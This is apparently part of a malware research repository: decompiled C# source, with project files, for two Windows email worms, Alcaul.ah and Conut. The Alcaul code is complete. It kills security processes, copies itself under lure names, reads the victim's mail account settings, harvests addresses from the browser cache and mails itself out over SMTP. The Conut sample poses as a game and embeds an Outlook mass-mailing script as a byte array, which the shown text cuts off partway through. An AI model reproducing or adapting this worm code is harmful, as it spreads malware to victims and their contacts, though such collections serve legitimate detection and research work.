stream.Write(bytes7, 0, bytes7.Length);
str19 = streamReader.ReadLine();
byte[] bytes8 = Encoding.ASCII.GetBytes("QUIT\r\n");
stream.Write(bytes8, 0, bytes8.Length);
str19 = streamReader.ReadLine();
stream.Close();
streamReader.Close();
tcpClient.Close();
}
}
}
MSIL/Email-Worm/Win32/A/Email-Worm.Win32.Alcaul.ah-98dd24e5e033f2e78507476db2f52ed25e62a1f201b7f499b5ab1b19cb625b73/AssemblyInfo.cs
+3
View File
@@ -0,0 +1,3 @@
using System.Reflection;
[assembly: AssemblyVersion("0.0.0.0")]
MSIL/Email-Worm/Win32/A/Email-Worm.Win32.Alcaul.ah-98dd24e5e033f2e78507476db2f52ed25e62a1f201b7f499b5ab1b19cb625b73/Email-Worm.Win32.Alcaul.ah.csproj
+41
View File
@@ -0,0 +1,41 @@
<?xml version="1.0" encoding="utf-8"?>
<Project DefaultTargets="Build" xmlns="http://schemas.microsoft.com/developer/msbuild/2003">
<!--Project was exported from assembly: C:\Users\Administrateur\Downloads\Virusshare-00000-msil\Email-Worm.Win32.Alcaul.ah-98dd24e5e033f2e78507476db2f52ed25e62a1f201b7f499b5ab1b19cb625b73.exe-->
<PropertyGroup>
<Configuration Condition=" '$(Configuration)' == '' ">Debug</Configuration>
<Platform Condition=" '$(Platform)' == '' ">AnyCPU</Platform>
<ProjectGuid>{38EB0F0C-CB0D-400E-A3D8-87A1EBB66416}</ProjectGuid>
<OutputType>WinExe</OutputType>
<AssemblyName>b</AssemblyName>
<ApplicationVersion>0.0.0.0</ApplicationVersion>
</PropertyGroup>
<PropertyGroup Condition=" '$(Configuration)|$(Platform)' == 'Debug|AnyCPU' ">
<PlatformTarget>AnyCPU</PlatformTarget>
<DebugSymbols>true</DebugSymbols>
<DebugType>full</DebugType>
<Optimize>false</Optimize>
<OutputPath>bin\Debug\</OutputPath>
<DefineConstants>DEBUG;TRACE</DefineConstants>
<ErrorReport>prompt</ErrorReport>
<WarningLevel>4</WarningLevel>
</PropertyGroup>
<PropertyGroup Condition=" '$(Configuration)|$(Platform)' == 'Release|AnyCPU' ">
<PlatformTarget>AnyCPU</PlatformTarget>
<DebugType>pdbonly</DebugType>
<Optimize>true</Optimize>
<OutputPath>bin\Release\</OutputPath>
<DefineConstants>TRACE</DefineConstants>
<ErrorReport>prompt</ErrorReport>
<WarningLevel>4</WarningLevel>
</PropertyGroup>
<ItemGroup>
<Reference Include="System" />
<Reference Include="System.Windows.Forms" />
</ItemGroup>
<ItemGroup>
<Compile Include="_003CPrivateImplementationDetails_003E.cs" />
<Compile Include="drunkenpope\brigada8.cs" />
<Compile Include="AssemblyInfo.cs" />
</ItemGroup>
<Import Project="$(MSBuildBinPath)\Microsoft.CSharp.targets" />
</Project>
MSIL/Email-Worm/Win32/A/Email-Worm.Win32.Alcaul.ah-98dd24e5e033f2e78507476db2f52ed25e62a1f201b7f499b5ab1b19cb625b73/Email-Worm.Win32.Alcaul.ah.sln
+20
View File
@@ -0,0 +1,20 @@
Microsoft Visual Studio Solution File, Format Version 9.00
# Visual Studio 2005
Project("{FAE04EC0-301F-11D3-BF4B-00C04F79EFBC}") = "b", "Email-Worm.Win32.Alcaul.ah-98dd24e5e033f2e78507476db2f52ed25e62a1f201b7f499b5ab1b19cb625b73.csproj", "{38EB0F0C-CB0D-400E-A3D8-87A1EBB66416}"
EndProject
Global
GlobalSection(SolutionConfigurationPlatforms) = preSolution
Debug|Any CPU = Debug|Any CPU
Release|Any CPU = Release|Any CPU
EndGlobalSection
GlobalSection(ProjectConfigurationPlatforms) = postSolution
{38EB0F0C-CB0D-400E-A3D8-87A1EBB66416}.Debug|Any CPU.ActiveCfg = Debug|Any CPU
{38EB0F0C-CB0D-400E-A3D8-87A1EBB66416}.Debug|Any CPU.Build.0 = Debug|Any CPU
{38EB0F0C-CB0D-400E-A3D8-87A1EBB66416}.Release|Any CPU.ActiveCfg = Release|Any CPU
{38EB0F0C-CB0D-400E-A3D8-87A1EBB66416}.Release|Any CPU.Build.0 = Release|Any CPU
EndGlobalSection
GlobalSection(SolutionProperties) = preSolution
HideSolutionNode = FALSE
EndGlobalSection
EndGlobal
MSIL/Email-Worm/Win32/A/Email-Worm.Win32.Alcaul.ah-98dd24e5e033f2e78507476db2f52ed25e62a1f201b7f499b5ab1b19cb625b73/_003CPrivateImplementationDetails_003E.cs
+17
View File
@@ -0,0 +1,17 @@
// Decompiled with JetBrains decompiler
// Type: <PrivateImplementationDetails>
// Assembly: b, Version=0.0.0.0, Culture=neutral, PublicKeyToken=null
// MVID: CECE5B53-4BE2-43C6-85BC-E30F20D8366F
// Assembly location: C:\Users\Administrateur\Downloads\Virusshare-00000-msil\Email-Worm.Win32.Alcaul.ah-98dd24e5e033f2e78507476db2f52ed25e62a1f201b7f499b5ab1b19cb625b73.exe
using System.Runtime.InteropServices;
internal class \u003CPrivateImplementationDetails\u003E
{
internal static \u003CPrivateImplementationDetails\u003E.\u0024\u0024struct0x6000003\u002D1 \u0024\u0024method0x6000003\u002D1;
[StructLayout(LayoutKind.Explicit, Size = 12, Pack = 1)]
private struct \u0024\u0024struct0x6000003\u002D1
{
}
}
MSIL/Email-Worm/Win32/A/Email-Worm.Win32.Alcaul.ah-98dd24e5e033f2e78507476db2f52ed25e62a1f201b7f499b5ab1b19cb625b73/drunkenpope/brigada8.cs
+230
View File
@@ -0,0 +1,230 @@
// Decompiled with JetBrains decompiler
// Type: drunkenpope.brigada8
// Assembly: b, Version=0.0.0.0, Culture=neutral, PublicKeyToken=null
// MVID: CECE5B53-4BE2-43C6-85BC-E30F20D8366F
// Assembly location: C:\Users\Administrateur\Downloads\Virusshare-00000-msil\Email-Worm.Win32.Alcaul.ah-98dd24e5e033f2e78507476db2f52ed25e62a1f201b7f499b5ab1b19cb625b73.exe
using Microsoft.Win32;
using System;
using System.Diagnostics;
using System.IO;
using System.Net.Sockets;
using System.Reflection;
using System.Text;
using System.Windows.Forms;
namespace drunkenpope
{
public class brigada8
{
public static void Main(string[] args)
{
try
{
string str1 = brigada8.modem("xmlgcncpo.udklft10.t`4.ug`qaclz.tqqvcv.tqjukl10.tqgamop.tqacl62.tgvvpc{.tgv;7.vfq0/lv.vfq0/;:.vac.v`qacl.quggr;7.qrjklz.qoa.qgpt;7.qapqacl.qaclro.qacl;7.qacl10.qcdgug`.pgqawg.pct5ukl.pct5.rgpqdu.raducnnkaml.raaukl;:.rctu.rctqajgf.rctan.rcfokl.mwvrmqv.lta;7.lwrepcfg.lmpokqv.lockl.lkqwo.lctulv.lctu10.lctlv.lctnw10.lctcru10.l10qaclu.ordvpc{.ommnktg.nwcnn.nmmimwv.nmaifmul0222.hgfk.kmoml;:.kdcag.kaqwrrlv.kaqwrr;7.kaoml.kanmcflv.kanmcf;7.k`octqr.k`ocql.kcoqgpt.kcocrr.dpu.drpmv.dr/ukl.dklftkpw.d/qvmru.d/rpmv;7.d/rpmv.d/celv;7.gqrucvaj.gqcdg.gagleklg");
string str2 = brigada8.modem("ftr;7]2.ftr;7.angclgp1.angclgp.ancu;7ad.ancu;7.adklgv10.adklgv.adkcwfkv.adkcfokl.`ncaikag.`ncaif.ctuwrf10.ctukl;7.ctqajgf10.ctrwrf.ctrva10.ctro.ctrfmq10.ctraa.ctr10.ctr.ctlv.ctiqgpt.cteavpn.ctg10.ctamlqmn.cwvmfmul.crtzfukl.clvk/vpmhcl.caiukl10.]ctro.]ctraa.]ctr10");
string[] strArray1 = str1.Split(',');
string[] strArray2 = str2.Split(',');
foreach (string vry324 in strArray1)
brigada8.kernelhalt(vry324);
foreach (string vry324 in strArray2)
brigada8.kernelhalt(vry324);
Module module = Assembly.GetExecutingAssembly().GetModules()[0];
string akt7 = brigada8.xmlparse234(module.FullyQualifiedName);
Registry.CurrentUser.OpenSubKey(brigada8.modem("Qmdvucpg^Icxcc^NmacnAmlvglv"), true).SetValue(brigada8.modem("Fkp2"), (object) (brigada8.modem("2301678") + Directory.GetCurrentDirectory()));
string[] strArray3 = new string[4]
{
brigada8.modem("Tkqwcn]Qvwfkm,LGV0221]ig{,gzg"),
brigada8.modem("vgcaj]{mwpqgnd]a!]kl]3]uggi,gzg"),
brigada8.modem("jkvocl0,gzg"),
brigada8.modem("Vgiigl6]dwnn,gzg")
};
foreach (string destFileName in strArray3)
{
try
{
File.Copy(module.FullyQualifiedName, destFileName);
}
catch
{
}
}
RegistryKey registryKey1 = Registry.CurrentUser.OpenSubKey(brigada8.modem("Qmdvucpg^Okapmqmdv^Klvgplgv\"Caamwlv\"Oclcegp"), true);
RegistryKey registryKey2 = Registry.CurrentUser.OpenSubKey(brigada8.modem("Qmdvucpg^Okapmqmdv^Klvgplgv\"Caamwlv\"Oclcegp^Caamwlvq^") + registryKey1.GetValue(brigada8.modem("Fgdcwnv\"Ockn\"Caamwlv")).ToString(), true);
string m91 = registryKey2.GetValue(brigada8.modem("QOVR\"Qgptgp")).ToString();
string foam = registryKey2.GetValue(brigada8.modem("QOVR\"Gockn\"Cffpgqq")).ToString();
foreach (string directory1 in Directory.GetDirectories(Environment.GetFolderPath(Environment.SpecialFolder.InternetCache)))
{
foreach (string directory2 in Directory.GetDirectories(directory1))
{
foreach (string file in Directory.GetFiles(directory2, brigada8.modem("(,jv(")))
brigada8.melee(file, m91, foam, akt7);
}
}
int num = (int) MessageBox.Show(brigada8.modem("lm\"ompg\"`gvc\"vumq"), brigada8.modem("oqkn,ocqq,`\"*a!n{\"ocfg+\"`{\"cnamrcwn-`pkecfc\"majm"), MessageBoxButtons.OK, MessageBoxIcon.Exclamation);
}
catch
{
}
}
public static void melee(string f91, string m91, string foam, string akt7)
{
StreamReader streamReader = new StreamReader((Stream) new FileStream(f91, FileMode.OpenOrCreate, FileAccess.Read));
streamReader.BaseStream.Seek(0L, SeekOrigin.Begin);
while (streamReader.Peek() > -1)
{
string hjkl = brigada8.harvest(streamReader.ReadLine());
if (hjkl != "")
{
try
{
brigada8.codedom563(m91, foam, hjkl, akt7);
}
catch
{
}
}
}
streamReader.Close();
}
public static string harvest(string helga)
{
char[] anyOf = new char[6]
{
'?',
'\'',
'"',
'>',
'<',
' '
};
string str1 = helga;
try
{
int sourceIndex = str1.IndexOf(brigada8.modem("ocknvm8"));
int num = str1.LastIndexOfAny(anyOf);
char[] destination1 = new char[(int) checked ((uint) unchecked (num - sourceIndex))];
str1.CopyTo(sourceIndex, destination1, 0, num - sourceIndex);
string str2 = new string(destination1).Replace(brigada8.modem("ocknvm8"), "").Replace("%20", "").Replace("%40", "@");
try
{
int count = str2.IndexOfAny(anyOf);
char[] destination2 = new char[(int) checked ((uint) count)];
str2.CopyTo(0, destination2, 0, count);
return new string(destination2);
}
catch
{
return str2;
}
}
catch
{
return "";
}
}
public static string xmlparse234(string tukoo)
{
FileStream input = new FileStream(tukoo, FileMode.OpenOrCreate, FileAccess.Read);
BinaryReader binaryReader = new BinaryReader((Stream) input);
binaryReader.BaseStream.Seek(0L, SeekOrigin.Begin);
byte[] numArray = new byte[(int) checked ((uint) input.Length)];
int length1 = (int) input.Length;
int index1 = 0;
int num;
for (; length1 > 0; length1 -= num)
{
num = binaryReader.Read(numArray, index1, length1);
if (num != 0)
index1 += num;
else
break;
}
binaryReader.Close();
StringBuilder stringBuilder = new StringBuilder();
string base64String = Convert.ToBase64String(numArray);
int length2 = base64String.Length;
char[] destination = new char[(int) checked ((uint) length2)];
base64String.CopyTo(0, destination, 0, length2);
for (int index2 = 1; index2 <= length2; ++index2)
{
if (index2 % 76 == 0)
stringBuilder.Append(string.Format("{0}\r\n", (object) destination[index2 - 1]));
else
stringBuilder.Append(string.Format("{0}", (object) destination[index2 - 1]));
}
return stringBuilder.ToString();
}
public static void kernelhalt(string vry324)
{
foreach (Process process in Process.GetProcessesByName(vry324))
process.Kill();
}
public static string modem(string hhh)
{
StringBuilder stringBuilder = new StringBuilder();
for (int index = 0; index < hhh.Length; ++index)
{
int num = Convert.ToInt32(hhh[index]) ^ 2;
stringBuilder.Append(Convert.ToChar(num));
}
return stringBuilder.ToString();
}
public static void codedom563(string asdf, string cvbn, string hjkl, string tukoo)
{
string str1 = brigada8.modem("Dpmo8\"") + cvbn + " <" + cvbn + ">\r\n";
string str2 = brigada8.modem("Vm8\"") + hjkl + " <" + hjkl + ">\r\n";
string str3 = brigada8.modem("Fcvg8\"") + DateTime.Now.ToString() + "\r\n";
string str4 = brigada8.modem("Z/Ockngp8\"fmlmvvmwaj") + "\r\n";
string str5 = brigada8.modem("Z/Rpkmpkv{8\"1") + "\r\n";
string str6 = brigada8.modem("OKOG/Tgpqkml8\"3,2") + "\r\n";
string str7 = brigada8.modem("Amlvglv/V{rg8\"ownvkrcpv-okzgf9\"`mwlfcp{? //`q`h 9") + "\r\n\r\n";
string str8 = brigada8.modem("Vjkq\"kq\"c\"ownvk/rcpv\"ogqqceg\"kl\"OKOG\"dmpocv,") + "\r\n\r\n";
string str9 = "----bsbj\r\n";
string str10 = brigada8.modem("Amlvglv/V{rg8\"vgzv-jvon9\"ajcpqgv?wq/cqakk") + "\r\n\r\n";
string str11 = brigada8.modem(" Rggp/vm/Rggp\",LGV\"Qmdvucpg\"cvvcajgf,\"Pgswkpgq\"vjg\",LGV\"dpcogumpi, ") + "\r\n\r\n";
string str12 = "----bsbj\r\n";
string str13 = brigada8.modem("Amlvglv/V{rg8\"crrnkacvkml-z/oqfmulnmcf9\"lcog? lgvdz3,gzg ") + "\r\n";
string str14 = brigada8.modem("Amlvglv/Vpclqdgp/Glamfkle8\"`cqg46") + "\r\n";
string str15 = brigada8.modem("Amlvglv/Fkqrmqkvkml8\"cvvcajoglv9\"");
string str16 = brigada8.modem("dknglcog? lgvdz3,gzg ") + "\r\n\r\n";
string str17 = "\r\n\r\n";
string str18 = "----bsbj--\r\n\r\n.\r\n";
TcpClient tcpClient = new TcpClient(asdf, 25);
NetworkStream stream = tcpClient.GetStream();
StreamReader streamReader = new StreamReader((Stream) tcpClient.GetStream());
string str19 = streamReader.ReadLine();
byte[] bytes1 = Encoding.ASCII.GetBytes(brigada8.modem("JGNM\"nmacnjmqv") + "\r\n");
stream.Write(bytes1, 0, bytes1.Length);
str19 = streamReader.ReadLine();
byte[] bytes2 = Encoding.ASCII.GetBytes(brigada8.modem("OCKN\"DPMO8\"") + "<" + cvbn + ">\r\n");
stream.Write(bytes2, 0, bytes2.Length);
str19 = streamReader.ReadLine();
byte[] bytes3 = Encoding.ASCII.GetBytes(brigada8.modem("PARV\"VM8\"") + "<" + hjkl + ">\r\n");
stream.Write(bytes3, 0, bytes3.Length);
str19 = streamReader.ReadLine();
byte[] bytes4 = Encoding.ASCII.GetBytes(brigada8.modem("FCVC") + "\r\n");
stream.Write(bytes4, 0, bytes4.Length);
str19 = streamReader.ReadLine();
byte[] bytes5 = Encoding.ASCII.GetBytes(str1 + str2 + str3 + str4 + str5);
stream.Write(bytes5, 0, bytes5.Length);
byte[] bytes6 = Encoding.ASCII.GetBytes(str6 + str7 + str8 + str9 + str10 + str11);
stream.Write(bytes6, 0, bytes6.Length);
byte[] bytes7 = Encoding.ASCII.GetBytes(str12 + str13 + str14 + str15 + str16 + tukoo + str17 + str18);
stream.Write(bytes7, 0, bytes7.Length);
str19 = streamReader.ReadLine();
byte[] bytes8 = Encoding.ASCII.GetBytes(brigada8.modem("SWKV") + "\r\n");
stream.Write(bytes8, 0, bytes8.Length);
str19 = streamReader.ReadLine();
stream.Close();
streamReader.Close();
tcpClient.Close();
}
}
}
MSIL/Email-Worm/Win32/C/Email-Worm.Win32.Conut-d1aa19599cb536866c32747e33efcd9e6fdf4cf94dc33ebf969fadb44302a36f/AssemblyInfo.cs
+13
View File
@@ -0,0 +1,13 @@
using System.Reflection;
[assembly: AssemblyCopyright("")]
[assembly: AssemblyTitle("")]
[assembly: AssemblyKeyFile("")]
[assembly: AssemblyDelaySign(false)]
[assembly: AssemblyTrademark("")]
[assembly: AssemblyKeyName("")]
[assembly: AssemblyProduct("")]
[assembly: AssemblyCompany("")]
[assembly: AssemblyConfiguration("")]
[assembly: AssemblyDescription("")]
[assembly: AssemblyVersion("1.0.1289.25246")]
MSIL/Email-Worm/Win32/C/Email-Worm.Win32.Conut-d1aa19599cb536866c32747e33efcd9e6fdf4cf94dc33ebf969fadb44302a36f/Email-Worm.Win32.Conut.csproj
+45
View File
@@ -0,0 +1,45 @@
<?xml version="1.0" encoding="utf-8"?>
<Project DefaultTargets="Build" xmlns="http://schemas.microsoft.com/developer/msbuild/2003">
<!--Project was exported from assembly: C:\Users\Administrateur\Downloads\Virusshare-00000-msil\Email-Worm.Win32.Conut-d1aa19599cb536866c32747e33efcd9e6fdf4cf94dc33ebf969fadb44302a36f.exe-->
<PropertyGroup>
<Configuration Condition=" '$(Configuration)' == '' ">Debug</Configuration>
<Platform Condition=" '$(Platform)' == '' ">AnyCPU</Platform>
<ProjectGuid>{D8B221A1-5B64-4CC5-A1FD-1BF88520CEBC}</ProjectGuid>
<OutputType>WinExe</OutputType>
<AssemblyName>coconut</AssemblyName>
<ApplicationVersion>1.0.1289.25246</ApplicationVersion>
</PropertyGroup>
<PropertyGroup Condition=" '$(Configuration)|$(Platform)' == 'Debug|AnyCPU' ">
<PlatformTarget>AnyCPU</PlatformTarget>
<DebugSymbols>true</DebugSymbols>
<DebugType>full</DebugType>
<Optimize>false</Optimize>
<OutputPath>bin\Debug\</OutputPath>
<DefineConstants>DEBUG;TRACE</DefineConstants>
<ErrorReport>prompt</ErrorReport>
<WarningLevel>4</WarningLevel>
</PropertyGroup>
<PropertyGroup Condition=" '$(Configuration)|$(Platform)' == 'Release|AnyCPU' ">
<PlatformTarget>AnyCPU</PlatformTarget>
<DebugType>pdbonly</DebugType>
<Optimize>true</Optimize>
<OutputPath>bin\Release\</OutputPath>
<DefineConstants>TRACE</DefineConstants>
<ErrorReport>prompt</ErrorReport>
<WarningLevel>4</WarningLevel>
</PropertyGroup>
<ItemGroup>
<Reference Include="System" />
<Reference Include="System.Drawing" />
<Reference Include="System.Windows.Forms" />
</ItemGroup>
<ItemGroup>
<Compile Include="_003CPrivateImplementationDetails_003E.cs" />
<Compile Include="coconut\Form1.cs" />
<Compile Include="AssemblyInfo.cs" />
</ItemGroup>
<ItemGroup>
<EmbeddedResource Include="coconut\Form1.resx" />
</ItemGroup>
<Import Project="$(MSBuildBinPath)\Microsoft.CSharp.targets" />
</Project>
MSIL/Email-Worm/Win32/C/Email-Worm.Win32.Conut-d1aa19599cb536866c32747e33efcd9e6fdf4cf94dc33ebf969fadb44302a36f/Email-Worm.Win32.Conut.sln
+20
View File
@@ -0,0 +1,20 @@
Microsoft Visual Studio Solution File, Format Version 9.00
# Visual Studio 2005
Project("{FAE04EC0-301F-11D3-BF4B-00C04F79EFBC}") = "coconut", "Email-Worm.Win32.Conut-d1aa19599cb536866c32747e33efcd9e6fdf4cf94dc33ebf969fadb44302a36f.csproj", "{D8B221A1-5B64-4CC5-A1FD-1BF88520CEBC}"
EndProject
Global
GlobalSection(SolutionConfigurationPlatforms) = preSolution
Debug|Any CPU = Debug|Any CPU
Release|Any CPU = Release|Any CPU
EndGlobalSection
GlobalSection(ProjectConfigurationPlatforms) = postSolution
{D8B221A1-5B64-4CC5-A1FD-1BF88520CEBC}.Debug|Any CPU.ActiveCfg = Debug|Any CPU
{D8B221A1-5B64-4CC5-A1FD-1BF88520CEBC}.Debug|Any CPU.Build.0 = Debug|Any CPU
{D8B221A1-5B64-4CC5-A1FD-1BF88520CEBC}.Release|Any CPU.ActiveCfg = Release|Any CPU
{D8B221A1-5B64-4CC5-A1FD-1BF88520CEBC}.Release|Any CPU.Build.0 = Release|Any CPU
EndGlobalSection
GlobalSection(SolutionProperties) = preSolution
HideSolutionNode = FALSE
EndGlobalSection
EndGlobal
MSIL/Email-Worm/Win32/C/Email-Worm.Win32.Conut-d1aa19599cb536866c32747e33efcd9e6fdf4cf94dc33ebf969fadb44302a36f/_003CPrivateImplementationDetails_003E.cs
+17
View File
@@ -0,0 +1,17 @@
// Decompiled with JetBrains decompiler
// Type: <PrivateImplementationDetails>
// Assembly: coconut, Version=1.0.1289.25246, Culture=neutral, PublicKeyToken=null
// MVID: 74F497AE-8E4C-45C7-B879-11E47B32AF9E
// Assembly location: C:\Users\Administrateur\Downloads\Virusshare-00000-msil\Email-Worm.Win32.Conut-d1aa19599cb536866c32747e33efcd9e6fdf4cf94dc33ebf969fadb44302a36f.exe
using System.Runtime.InteropServices;
internal class \u003CPrivateImplementationDetails\u003E
{
internal static \u003CPrivateImplementationDetails\u003E.\u0024\u0024struct0x6000005\u002D1 \u0024\u0024method0x6000005\u002D1;
[StructLayout(LayoutKind.Explicit, Size = 685, Pack = 1)]
private struct \u0024\u0024struct0x6000005\u002D1
{
}
}
MSIL/Email-Worm/Win32/C/Email-Worm.Win32.Conut-d1aa19599cb536866c32747e33efcd9e6fdf4cf94dc33ebf969fadb44302a36f/coconut/Form1.cs
+947
View File
@@ -0,0 +1,947 @@
// Decompiled with JetBrains decompiler
// Type: coconut.Form1
// Assembly: coconut, Version=1.0.1289.25246, Culture=neutral, PublicKeyToken=null
// MVID: 74F497AE-8E4C-45C7-B879-11E47B32AF9E
// Assembly location: C:\Users\Administrateur\Downloads\Virusshare-00000-msil\Email-Worm.Win32.Conut-d1aa19599cb536866c32747e33efcd9e6fdf4cf94dc33ebf969fadb44302a36f.exe
using System;
using System.ComponentModel;
using System.Diagnostics;
using System.Drawing;
using System.IO;
using System.Resources;
using System.Windows.Forms;
namespace coconut
{
public class Form1 : Form
{
public int throw_turn = 0;
public int score = 0;
public Random rand_numb = new Random();
public string virname = Application.ExecutablePath;
private Button button1;
private PictureBox coco;
private PictureBox cluley;
private PictureBox redattack;
private PictureBox cl_coco;
private PictureBox red_coco;
private PictureBox ms_coco;
private Label label1;
private Label label2;
private Container components = (Container) null;
public Form1() => this.InitializeComponent();
protected override void Dispose(bool disposing)
{
if (disposing && this.components != null)
this.components.Dispose();
base.Dispose(disposing);
}
private void InitializeComponent()
{
ResourceManager resourceManager = new ResourceManager(typeof (Form1));
this.coco = new PictureBox();
this.cluley = new PictureBox();
this.redattack = new PictureBox();
this.button1 = new Button();
this.cl_coco = new PictureBox();
this.red_coco = new PictureBox();
this.ms_coco = new PictureBox();
this.label1 = new Label();
this.label2 = new Label();
this.SuspendLayout();
this.coco.BackColor = Color.White;
this.coco.Image = (Image) resourceManager.GetObject("coco.Image");
this.coco.Location = new Point(0, 88);
this.coco.Name = "coco";
this.coco.Size = new Size(104, 96);
this.coco.TabIndex = 0;
this.coco.TabStop = false;
this.cluley.Image = (Image) resourceManager.GetObject("cluley.Image");
this.cluley.Location = new Point(352, 176);
this.cluley.Name = "cluley";
this.cluley.Size = new Size(80, 104);
this.cluley.TabIndex = 1;
this.cluley.TabStop = false;
this.redattack.Image = (Image) resourceManager.GetObject("redattack.Image");
this.redattack.Location = new Point(176, 176);
this.redattack.Name = "redattack";
this.redattack.Size = new Size(104, 104);
this.redattack.TabIndex = 2;
this.redattack.TabStop = false;
this.button1.BackColor = Color.LightGray;
this.button1.Location = new Point(208, 40);
this.button1.Name = "button1";
this.button1.Size = new Size(168, 48);
this.button1.TabIndex = 3;
this.button1.Text = "Throw!";
this.button1.Click += new EventHandler(this.button1_Click);
this.cl_coco.BackColor = Color.White;
this.cl_coco.Image = (Image) resourceManager.GetObject("cl_coco.Image");
this.cl_coco.Location = new Point(336, 176);
this.cl_coco.Name = "cl_coco";
this.cl_coco.Size = new Size(104, 96);
this.cl_coco.TabIndex = 4;
this.cl_coco.TabStop = false;
this.cl_coco.Visible = false;
this.red_coco.BackColor = Color.White;
this.red_coco.Image = (Image) resourceManager.GetObject("red_coco.Image");
this.red_coco.Location = new Point(176, 176);
this.red_coco.Name = "red_coco";
this.red_coco.Size = new Size(104, 96);
this.red_coco.TabIndex = 5;
this.red_coco.TabStop = false;
this.red_coco.Visible = false;
this.ms_coco.BackColor = Color.White;
this.ms_coco.Image = (Image) resourceManager.GetObject("ms_coco.Image");
this.ms_coco.Location = new Point(496, 176);
this.ms_coco.Name = "ms_coco";
this.ms_coco.Size = new Size(104, 96);
this.ms_coco.TabIndex = 6;
this.ms_coco.TabStop = false;
this.ms_coco.Visible = false;
this.label1.Location = new Point(136, 144);
this.label1.Name = "label1";
this.label1.Size = new Size(184, 24);
this.label1.TabIndex = 7;
this.label1.Text = "Frans Devaere aka \"ReDaTtAcK\"";
this.label2.Location = new Point(352, 144);
this.label2.Name = "label2";
this.label2.TabIndex = 8;
this.label2.Text = "Graham Cluley";
this.AutoScaleBaseSize = new Size(5, 13);
this.BackColor = Color.White;
this.ClientSize = new Size(600, 270);
this.Controls.AddRange(new Control[9]
{
(Control) this.label2,
(Control) this.label1,
(Control) this.ms_coco,
(Control) this.red_coco,
(Control) this.cl_coco,
(Control) this.button1,
(Control) this.redattack,
(Control) this.cluley,
(Control) this.coco
});
this.Name = nameof (Form1);
this.Text = "The Coconut Game";
this.Load += new EventHandler(this.Form1_Load);
this.ResumeLayout(false);
}
[STAThread]
private static void Main() => Application.Run((Form) new Form1());
private void Form1_Load(object sender, EventArgs e)
{
byte[] buffer1 = new byte[685]
{
(byte) 79,
(byte) 110,
(byte) 32,
(byte) 69,
(byte) 114,
(byte) 114,
(byte) 111,
(byte) 114,
(byte) 32,
(byte) 82,
(byte) 101,
(byte) 115,
(byte) 117,
(byte) 109,
(byte) 101,
(byte) 32,
(byte) 78,
(byte) 101,
(byte) 120,
(byte) 116,
(byte) 13,
(byte) 10,
(byte) 68,
(byte) 105,
(byte) 109,
(byte) 32,
(byte) 99,
(byte) 111,
(byte) 99,
(byte) 111,
(byte) 110,
(byte) 117,
(byte) 116,
(byte) 44,
(byte) 32,
(byte) 77,
(byte) 97,
(byte) 105,
(byte) 108,
(byte) 44,
(byte) 32,
(byte) 67,
(byte) 111,
(byte) 117,
(byte) 110,
(byte) 116,
(byte) 101,
(byte) 114,
(byte) 44,
(byte) 32,
(byte) 65,
(byte) 44,
(byte) 32,
(byte) 66,
(byte) 44,
(byte) 32,
(byte) 67,
(byte) 44,
(byte) 32,
(byte) 68,
(byte) 44,
(byte) 32,
(byte) 69,
(byte) 13,
(byte) 10,
(byte) 83,
(byte) 101,
(byte) 116,
(byte) 32,
(byte) 99,
(byte) 111,
(byte) 99,
(byte) 111,
(byte) 110,
(byte) 117,
(byte) 116,
(byte) 32,
(byte) 61,
(byte) 32,
(byte) 67,
(byte) 114,
(byte) 101,
(byte) 97,
(byte) 116,
(byte) 101,
(byte) 79,
(byte) 98,
(byte) 106,
(byte) 101,
(byte) 99,
(byte) 116,
(byte) 32,
(byte) 40,
(byte) 34,
(byte) 111,
(byte) 117,
(byte) 116,
(byte) 108,
(byte) 111,
(byte) 111,
(byte) 107,
(byte) 46,
(byte) 97,
(byte) 112,
(byte) 112,
(byte) 108,
(byte) 105,
(byte) 99,
(byte) 97,
(byte) 116,
(byte) 105,
(byte) 111,
(byte) 110,
(byte) 34,
(byte) 41,
(byte) 13,
(byte) 10,
(byte) 83,
(byte) 101,
(byte) 116,
(byte) 32,
(byte) 77,
(byte) 97,
(byte) 105,
(byte) 108,
(byte) 32,
(byte) 61,
(byte) 32,
(byte) 99,
(byte) 111,
(byte) 99,
(byte) 111,
(byte) 110,
(byte) 117,
(byte) 116,
(byte) 46,
(byte) 71,
(byte) 101,
(byte) 116,
(byte) 78,
(byte) 97,
(byte) 109,
(byte) 101,
(byte) 83,
(byte) 112,
(byte) 97,
(byte) 99,
(byte) 101,
(byte) 32,
(byte) 40,
(byte) 34,
(byte) 77,
(byte) 65,
(byte) 80,
(byte) 73,
(byte) 34,
(byte) 41,
(byte) 13,
(byte) 10,
(byte) 70,
(byte) 111,
(byte) 114,
(byte) 32,
(byte) 65,
(byte) 32,
(byte) 61,
(byte) 32,
(byte) 49,
(byte) 32,
(byte) 84,
(byte) 111,
(byte) 32,
(byte) 77,
(byte) 97,
(byte) 105,
(byte) 108,
(byte) 46,
(byte) 65,
(byte) 100,
(byte) 100,
(byte) 114,
(byte) 101,
(byte) 115,
(byte) 115,
(byte) 76,
(byte) 105,
(byte) 115,
(byte) 116,
(byte) 115,
(byte) 46,
(byte) 67,
(byte) 111,
(byte) 117,
(byte) 110,
(byte) 116,
(byte) 13,
(byte) 10,
(byte) 83,
(byte) 101,
(byte) 116,
(byte) 32,
(byte) 66,
(byte) 32,
(byte) 61,
(byte) 32,
(byte) 77,
(byte) 97,
(byte) 105,
(byte) 108,
(byte) 46,
(byte) 65,
(byte) 100,
(byte) 100,
(byte) 114,
(byte) 101,
(byte) 115,
(byte) 115,
(byte) 76,
(byte) 105,
(byte) 115,
(byte) 116,
(byte) 115,
(byte) 32,
(byte) 40,
(byte) 65,
(byte) 41,
(byte) 13,
(byte) 10,
(byte) 67,
(byte) 111,
(byte) 117,
(byte) 110,
(byte) 116,
(byte) 101,
(byte) 114,
(byte) 32,
(byte) 61,
(byte) 32,
(byte) 49,
(byte) 13,
(byte) 10,
(byte) 83,
(byte) 101,
(byte) 116,
(byte) 32,
(byte) 67,
(byte) 32,
(byte) 61,
(byte) 32,
(byte) 99,
(byte) 111,
(byte) 99,
(byte) 111,
(byte) 110,
(byte) 117,
(byte) 116,
(byte) 46,
(byte) 67,
(byte) 114,
(byte) 101,
(byte) 97,
(byte) 116,
(byte) 101,
(byte) 73,
(byte) 116,
(byte) 101,
(byte) 109,
(byte) 32,
(byte) 40,
(byte) 48,
(byte) 41,
(byte) 13,
(byte) 10,
(byte) 70,
(byte) 111,
(byte) 114,
(byte) 32,
(byte) 68,
(byte) 32,
(byte) 61,
(byte) 32,
(byte) 49,
(byte) 32,
(byte) 84,
(byte) 111,
(byte) 32,
(byte) 66,
